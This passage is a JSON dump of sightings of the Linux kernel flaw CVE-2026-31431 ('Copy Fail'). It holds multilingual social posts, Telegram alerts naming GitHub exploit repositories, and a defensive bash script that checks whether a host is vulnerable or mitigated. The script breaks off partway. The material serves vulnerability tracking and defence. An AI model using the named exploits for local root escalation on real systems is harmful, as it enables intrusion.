\u8d77\u7684\u5404\u4e2a\u7248\u672c\uff0c\u4e5f\u5c31\u662f\u76ee\u524d\u5e02\u9762\u4e0a\u7edd\u5927\u591a\u6570\u6b63\u5728\u8fd0\u884c Linux \u7684\u7cfb\u7edf\u3002\n- Ubuntu 26.04 (resolute)\u3001Debian 14 (forky) \u53ca Debian Sid \u7684\u6700\u65b0\u7248\u672c\u5185\u6838\u5df2\u4fee\u590d\u6b64\u95ee\u9898\u3002\u7136\u800c\uff0c\u7edd\u5927\u591a\u6570\u53d1\u884c\u7248/\u7248\u672c\u5c1a\u672a\u6709\u4fee\u590d\u3002 [2]\n- Mitigation \u65b9\u5f0f\u662f\u7981\u7528 algif_aead \u6a21\u5757\uff1b\u9884\u8ba1\u7edd\u5927\u90e8\u5206\u8f6f\u4ef6\u4e0d\u4f1a\u56e0\u6b64\u53d7\u5230\u5e72\u6270\u3002 [1]\n\nCVE: CVE-2026-31431 ... [1/2]", "creation_timestamp": "2026-05-06T03:58:06.068971Z"}, {"uuid": "6fd05cb4-e46d-49fc-b5af-67a873914f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/winsontang.com/post/3ml5tp44i2k2u", "content": "CVE-2026-31431 highlights a critical vulnerability impacting rootless containers, exposing potential security risks. Understanding this \"copy fail\" issue is essential for maintaining robust container security. Stay informed and protect your environments! #Cybersecurity #DevOps", "creation_timestamp": "2026-05-06T04:15:32.548230Z"}, {"uuid": "d3fc1786-4296-4b03-a501-b335a93d414b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82994", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-pythonlower3.10\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a OneDemobird\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 03:59:07\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\npython3.10\u4ee5\u4e0b\u6ca1\u6709os.splice\uff0c\u641e\u4e86\u4e00\u4e2a3.10\u4ee5\u4e0b\u7248\u672c\u4e5f\u53ef\u4ee5\u7528\u7684\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T04:00:04.000000Z"}, {"uuid": "f3f2340f-3c50-457d-8be7-b58e32f30a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml5zkkioec2x", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-06T06:00:22.308940Z"}, {"uuid": "e0e56f08-96d4-46ab-8db0-558682fe26ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T20:00:00.000000Z"}, {"uuid": "a75498f0-1844-4ec2-8c3d-112ade4982e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelhead.bsky.social/post/3ml3zi47fz22h", "content": "Wegen diesem Copy Fail Bug CVE-2026-31431 bei #linux ... ich wei\u00df jetzt immer noch nicht, ob oder wie sehr das Smartphones oder Tablets mit Android betrifft.\nIch habe mal auf meknem Linuxrechner nach meiner Kernel Baureihe nachgeschaut (im Changelog) und da ist noch kein Fix dabei. \n#copyfail", "creation_timestamp": "2026-05-05T10:53:40.759470Z"}, {"uuid": "8b806e28-a77e-4fe6-b3ec-018146a8bdaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkcchk2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:01.730042Z"}, {"uuid": "88b1fdcb-921c-47dd-88d8-e4c2ecc5ec19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkcgek2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:04.184085Z"}, {"uuid": "0483070e-3923-4215-9d42-2c032f23eaf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkchds2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:11.182473Z"}, {"uuid": "1e44f5ba-a74c-4c44-9fcd-ec704e31afb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkrgtk2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:11.897142Z"}, {"uuid": "acf74f11-8c58-41d3-8caf-cfb27bee6f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/albertvalo.itch.io/post/3ml43vkrjrc2f", "content": "vale aviam. Resulta que s'ha descobert una vulnerabilitat en el kernel anonemada Copy Fail, o CVE-2026-31431, la cual dona acc\u00e9s privilegiat (root) a qualsevol usuario sense aquests privilegis. Aix\u00f2 es un problema perqu\u00e8 imagina que un script de python solicita aquests privilegis aprofitant-se", "creation_timestamp": "2026-05-05T11:37:22.053068Z"}, {"uuid": "355766e2-ae56-48aa-ad57-090b9206bf92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/habr_com_news/46251", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u041d\u0422\u0426 \u0418\u0422 \u00ab\u0420\u043e\u0441\u0430\u00bb \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2026-31431, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0439 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Copy Fail. \u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u0435 \u0425\u0430\u0431\u0440\u0430 \u0432 \u043f\u0440\u0435\u0441\u0441\u2011\u0441\u043b\u0443\u0436\u0431\u0435 \u041d\u0422\u0426 \u0418\u0422 \u00ab\u0420\u043e\u0441\u0430\u00bb, \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0439 \u043a\u0430\u0440\u0442\u043e\u0447\u043a\u0435 ROSA Bugzilla \u043f\u043e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u043a\u0430\u0437\u0430\u043d \u0441\u0442\u0430\u0442\u0443\u0441 RESOLVED FIXED. \u0422\u0430\u043c \u0436\u0435 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u044b \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0441\u0431\u043e\u0440\u043a\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0435\u0440 \u0434\u043b\u044f ROSA 13 \u0438 ROSA 2021.1 (ROSA 12), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044f\u0434\u0440\u0430 6.12, 6.6, 5.15 \u0438 5.10. \u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0435\u0440 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0434\u043b\u044f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440 x86_64 (Intel, AMD), aarch64 (Baikal\u2011M, Baikal\u2011L) \u0438 loongarch64 (Loongson, \u00ab\u0418\u0440\u0442\u044b\u0448\u00bb).\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u041e\u0421", "creation_timestamp": "2026-05-05T11:37:13.000000Z"}, {"uuid": "32382e0d-265e-4a75-a170-51da488cef3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82904", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Industri4l-H3ll-Xpl0it3rs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 10:59:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 Exploit | by infrar3d\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T11:00:04.000000Z"}, {"uuid": "279b3b04-b993-4724-9a87-ad83d8bc5f2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82888", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy-Fail-CVE-2026-31431-Kubernetes-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Percivalll\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 44  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 14\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 09:55:23\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T10:00:05.000000Z"}, {"uuid": "32c85257-8ab3-40b4-8d95-51ee5b7927d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3ml66gofldtr2", "content": "Linux Kernel Vulnerability \u201cCopy Fail\u201d (CVE-2026-31431) \u2014 Immediate Action Required hairydog: rmmod algif_aead 2>/dev/null || true No, that alone is not a reliable mitigation. This does no...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-06T07:27:45.878461Z"}, {"uuid": "ee6bbb38-21f9-4b95-9eff-64a999052ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/khoipro/fbcbfa478c3fd58b001a2dc3d620bcdf", "content": "#!/bin/bash\n# CVE-2026-31431 (\"Copy Fail\") \u2014 pure-bash static vulnerability checker\n#\n# Exit codes:\n#   0 = NOT VULNERABLE (patched kernel or preconditions not met)\n#   1 = INCONCLUSIVE\n#   2 = LIKELY VULNERABLE\n#   3 = MITIGATED (workaround applied, kernel not yet patched)\n#\n# Use only on hosts you own or are explicitly authorized to test.\n\nKERNEL=$(uname -r)\nARCH=$(uname -m)\nALG_NAME=\"authencesn(hmac(sha256),cbc(aes))\"\n\nRED='\\033[0;31m'; GREEN='\\033[0;32m'; YELLOW='\\033[1;33m'\nBOLD='\\033[1m';   DIM='\\033[2m';      NC='\\033[0m'\n\n# \u2500\u2500\u2500 result variables \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nR_KVER=\"\"        # patched | vulnerable | not_affected | unknown\nR_KVER_NOTE=\"\"\nR_CFG=\"\"         # m | y | not_set | unknown\nR_MOD=\"\"         # loaded | on_disk | absent\nR_AF_ALG=\"\"      # available | unavailable\nR_CRYPTO=\"\"      # present | absent\nR_WORKAROUND=\"\"  # blacklist | cmdline | both | none\nR_WA_NOTE=\"\"\nR_CONTAINER=\"\"   # no | docker | container | systemd-nspawn\n\n# \u2500\u2500\u2500 checks (silent) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ncheck_kernel_version() {\n    local rel=\"${KERNEL%%-*}\"\n    local major minor patch\n    IFS='.' read -r major minor patch <<< \"$rel\"\n    patch=\"${patch%%[^0-9]*}\"\n    major=\"${major:-0}\"; minor=\"${minor:-0}\"; patch=\"${patch:-0}\"\n\n    if [ \"$major\" -lt 4 ] || { [ \"$major\" -eq 4 ] && [ \"$minor\" -lt 14 ]; }; then\n        R_KVER=\"not_affected\"; R_KVER_NOTE=\"< 4.14, predates vulnerable code\"; return\n    fi\n\n    # \u2500\u2500 RHEL-family kernels \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    # Format: major.minor.0-BUILD.elX[_Y].ARCH  (e.g. 5.14.0-214.el9.x86_64)\n    # The upstream sublevel is always .0; the RHEL build number carries the\n    # real patch level.  We cannot compare patch against the upstream LTS\n    # table, so we check the RPM changelog for the actual CVE fix.\n    if echo \"$KERNEL\" | grep -qE \"\\.el[0-9]\"; then\n        local rhel_build el_tag kern_pkg\n        rhel_build=$(echo \"$KERNEL\" | sed 's/.*-\\([0-9]*\\)\\..*/\\1/')\n        el_tag=$(echo \"$KERNEL\" | grep -oE \"el[0-9]+(_[0-9]+)?\" | head -1)\n\n        if command -v rpm >/dev/null 2>&1; then\n            # Find the exact RPM that owns this kernel's vmlinuz\n            kern_pkg=$(rpm -qf \"/boot/vmlinuz-${KERNEL}\" 2>/dev/null | head -1)\n            # Fallback: kernel-core package by NEVRA\n            [ -z \"$kern_pkg\" ] && \\\n                kern_pkg=$(rpm -qa 2>/dev/null | grep -E \"^kernel(-core)?-\" \\\n                           | grep \"${KERNEL%.*}\" | head -1)\n            if [ -n \"$kern_pkg\" ]; then\n                if rpm -q --changelog \"$kern_pkg\" 2>/dev/null \\\n                        | grep -qF \"CVE-2026-31431\"; then\n                    R_KVER=\"patched\"\n                    R_KVER_NOTE=\"RHEL backport confirmed (${el_tag} build ${rhel_build})\"\n                else\n                    R_KVER=\"vulnerable\"\n                    R_KVER_NOTE=\"RHEL ${el_tag} build ${rhel_build} \u2014 CVE-2026-31431 not in kernel changelog\"\n                fi\n            else\n                # Package query failed (container without /boot, or non-RPM overlay)\n                R_KVER=\"unknown\"\n                R_KVER_NOTE=\"RHEL ${el_tag} \u2014 run: rpm -q --changelog kernel-core-\\$(uname -r) | grep CVE-2026-31431\"\n            fi\n        else\n            R_KVER=\"unknown\"\n            R_KVER_NOTE=\"RHEL-family ${el_tag} build ${rhel_build} \u2014 check Red Hat advisory for CVE-2026-31431\"\n        fi\n        return\n    fi\n\n    # \u2500\u2500 Upstream LTS version table \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    local patched=0 min_patch=\"\"\n    case \"$major.$minor\" in\n        5.10) min_patch=254; [ \"$patch\" -ge 254 ] && patched=1 ;;\n        5.15) min_patch=204; [ \"$patch\" -ge 204 ] && patched=1 ;;\n        6.1)  min_patch=170; [ \"$patch\" -ge 170 ] && patched=1 ;;\n        6.6)  min_patch=137; [ \"$patch\" -ge 137 ] && patched=1 ;;\n        6.12) min_patch=85;  [ \"$patch\" -ge 85  ] && patched=1 ;;\n        6.18) min_patch=22;  [ \"$patch\" -ge 22  ] && patched=1 ;;\n        6.19) min_patch=12;  [ \"$patch\" -ge 12  ] && patched=1 ;;\n    esac\n\n    if [ \"$patched\" -eq 1 ]; then\n        R_KVER=\"patched\"; R_KVER_NOTE=\"patched release\"\n    elif [ -n \"$min_patch\" ]; then\n        R_KVER=\"vulnerable\"; R_KVER_NOTE=\"vulnerable, patched >= $major.$minor.$min_patch\"\n    elif { [ \"$major\" -gt 6 ] || { [ \"$major\" -eq 6 ] && [ \"$minor\" -ge 20 ]; }; }; then\n        # Beyond the highest tracked LTS \u2014 may or may not be patched\n        R_KVER=\"unknown\"; R_KVER_NOTE=\"beyond tracked versions \u2014 check distro advisory\"\n    else\n        # 4.14\u20136.19 non-LTS or EOL: in vulnerable range, no upstream fix for this series\n        R_KVER=\"vulnerable\"\n        R_KVER_NOTE=\"non-LTS/EOL upstream series ${major}.${minor} \u2014 no upstream fix available\"\n    fi\n}\n\ncheck_kernel_config() {\n    local val\n    val=$(grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\" /boot/config-\"$KERNEL\" 2>/dev/null \\\n        || zcat /proc/config.gz 2>/dev/null | grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\")\n    case \"$val\" in\n        *=m) R_CFG=\"m\" ;;\n        *=y) R_CFG=\"y\" ;;\n        \"\")\n            # Distinguish: config file readable but key absent = not compiled\n            #              config file unreadable            = unknown state\n            if [ -r \"/boot/config-${KERNEL}\" ] || [ -r /proc/config.gz ]; then\n                R_CFG=\"not_set\"\n            else\n                R_CFG=\"unknown\"\n            fi\n            ;;\n        *)   R_CFG=\"unknown\" ;;\n    esac\n}\n\ncheck_module() {\n    if lsmod 2>/dev/null | grep -q \"^algif_aead\"; then\n        R_MOD=\"loaded\"; return\n    fi\n    local ko\n    ko=$(find /lib/modules/\"$KERNEL\" -name \"algif_aead.ko*\" 2>/dev/null | head -1)\n    [ -n \"$ko\" ] && R_MOD=\"on_disk\" || R_MOD=\"absent\"\n}\n\ncheck_af_alg() {\n    if grep -qE \"^ALG\\b\" /proc/net/protocols 2>/dev/null \\\n        || lsmod 2>/dev/null | grep -q \"^af_alg\"; then\n        R_AF_ALG=\"available\"\n    else\n        R_AF_ALG=\"unavailable\"\n    fi\n}\n\ncheck_proc_crypto() {\n    if [ ! -r /proc/crypto ]; then\n        R_CRYPTO=\"absent\"; return\n    fi\n    grep -qF \"name         : $ALG_NAME\" /proc/crypto 2>/dev/null \\\n        && R_CRYPTO=\"present\" || R_CRYPTO=\"absent\"\n}\n\ncheck_workaround() {\n    local bl=0 cl=0 gb=0\n\n    # 1. modprobe.d blacklist (=m case, effective immediately after rmmod)\n    if grep -rl \"install algif_aead /bin/false\" /etc/modprobe.d/ 2>/dev/null | grep -q .; then\n        bl=1\n    fi\n\n    # 2. initcall_blacklist active in CURRENT boot (=y case, effective now)\n    grep -q \"initcall_blacklist=algif_aead_init\" /proc/cmdline 2>/dev/null && cl=1\n\n    # 3. initcall_blacklist configured in bootloader but NOT yet active (pending reboot)\n    if [ $cl -eq 0 ]; then\n        if command -v grubby >/dev/null 2>&1 \\\n                && grubby --info=ALL 2>/dev/null \\\n                   | grep -qF \"initcall_blacklist=algif_aead_init\"; then\n            gb=1\n        elif grep -q \"initcall_blacklist=algif_aead_init\" /etc/default/grub 2>/dev/null; then\n            gb=1\n        fi\n    fi\n\n    if   [ $bl -eq 1 ] && [ $cl -eq 1 ]; then\n        R_WORKAROUND=\"both\";      R_WA_NOTE=\"blacklist + cmdline\"\n    elif [ $bl -eq 1 ]; then\n        R_WORKAROUND=\"blacklist\"; R_WA_NOTE=\"/etc/modprobe.d/\"\n    elif [ $cl -eq 1 ]; then\n        R_WORKAROUND=\"cmdline\";   R_WA_NOTE=\"initcall_blacklist active in /proc/cmdline\"\n    elif [ $gb -eq 1 ]; then\n        R_WORKAROUND=\"pending\";   R_WA_NOTE=\"configured in bootloader \u2014 reboot required to activate\"\n    else\n        R_WORKAROUND=\"none\";      R_WA_NOTE=\"\"\n    fi\n}\n\ncheck_container() {\n    if [ -f /.dockerenv ]; then\n        R_CONTAINER=\"docker\"\n    elif grep -qE \"lxc|kubepods|docker|containerd\" /proc/1/cgroup 2>/dev/null; then\n        R_CONTAINER=\"container\"\n    elif [ -n \"${container:-}\" ]; then\n        R_CONTAINER=\"systemd-nspawn\"\n    else\n        R_CONTAINER=\"no\"\n    fi\n}\n\n# \u2500\u2500\u2500 run all checks silently \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ncheck_kernel_version\ncheck_kernel_config\ncheck_module\ncheck_af_alg\ncheck_proc_crypto\ncheck_workaround\ncheck_container\n\n# \u2500\u2500\u2500 helper: colored label \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nclabel() {\n    # clabel COLOR \"TEXT\"\n    printf \"${1}%-12s${NC}\" \"$2\"\n}\n\nok()   { clabel \"$GREEN\"  \"$1\"; }\nbad()  { clabel \"$RED\"    \"$1\"; }\nmeh()  { clabel \"$YELLOW\" \"$1\"; }\ndim()  { printf \"${DIM}%s${NC}\" \"$1\"; }\n\n# \u2500\u2500\u2500 status table \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nW=54\nDIV=$(printf '\u2500%.0s' $(seq 1 $W))\n\necho -e \"${BOLD}CVE-2026-31431 \\\"Copy Fail\\\"${NC}  \u00b7  $KERNEL  \u00b7  $ARCH\"\necho \"$DIV\"\nprintf \"  %-18s %-14s %s\\n\" \"CHECK\" \"VALUE\" \"NOTE\"\necho \"$DIV\"\n\n# 1. Kernel version\nprintf \"  %-18s \" \"Kernel\"\ncase \"$R_KVER\" in\n    patched)      ok  \"patched\"     ;;\n    not_affected) ok  \"not affected\" ;;\n    vulnerable)   bad \"vulnerable\"  ;;\n    *)            meh \"unknown\"     ;;\nesac\nprintf \"  %s\\n\" \"$(dim \"$R_KVER_NOTE\")\"\n\n# 2. Kernel config\nprintf \"  %-18s \" \"Config\"\ncase \"$R_CFG\" in\n    not_set) ok  \"not set\"  ;;\n    m)       meh \"=m\"       ;;\n    y)       bad \"=y\"       ;;\n    *)       meh \"unknown\"  ;;\nesac\ncase \"$R_CFG\" in\n    m)       printf \"  %s\\n\" \"$(dim \"loadable module\")\" ;;\n    y)       printf \"  %s\\n\" \"$(dim \"built-in, rmmod N/A\")\" ;;\n    not_set) printf \"  %s\\n\" \"$(dim \"not compiled\")\" ;;\n    unknown) printf \"  %s\\n\" \"$(dim \"config file unreadable\")\" ;;\n    *)       printf \"\\n\" ;;\nesac\n\n# 3. Module\nprintf \"  %-18s \" \"algif_aead\"\ncase \"$R_MOD\" in\n    loaded)   bad \"loaded\"    ;;\n    on_disk)  meh \"not loaded\" ;;\n    absent)   ok  \"absent\"    ;;\nesac\ncase \"$R_MOD\" in\n    on_disk) printf \"  %s\\n\" \"$(dim \"module file on disk\")\" ;;\n    *)       printf \"\\n\" ;;\nesac\n\n# 4. AF_ALG\nprintf \"  %-18s \" \"AF_ALG socket\"\ncase \"$R_AF_ALG\" in\n    available)   meh \"available\"   ;;\n    unavailable) ok  \"unavailable\" ;;\nesac\nprintf \"\\n\"\n\n# 5. authencesn\nprintf \"  %-18s \" \"authencesn\"\ncase \"$R_CRYPTO\" in\n    present) bad \"instantiated\" ;;\n    absent)  ok  \"absent\"       ;;\nesac\nprintf \"  %s\\n\" \"$(dim \"/proc/crypto\")\"\n\n# 6. Workaround\nprintf \"  %-18s \" \"Workaround\"\ncase \"$R_WORKAROUND\" in\n    both|blacklist|cmdline) ok  \"${R_WORKAROUND}\" ;;\n    pending)                meh \"pending\"          ;;\n    none)                   bad \"none\"             ;;\nesac\n[ -n \"$R_WA_NOTE\" ] && printf \"  %s\\n\" \"$(dim \"$R_WA_NOTE\")\" || printf \"\\n\"\n\n# 7. Container (only shown when detected \u2014 skipping host means checks may mislead)\nif [ 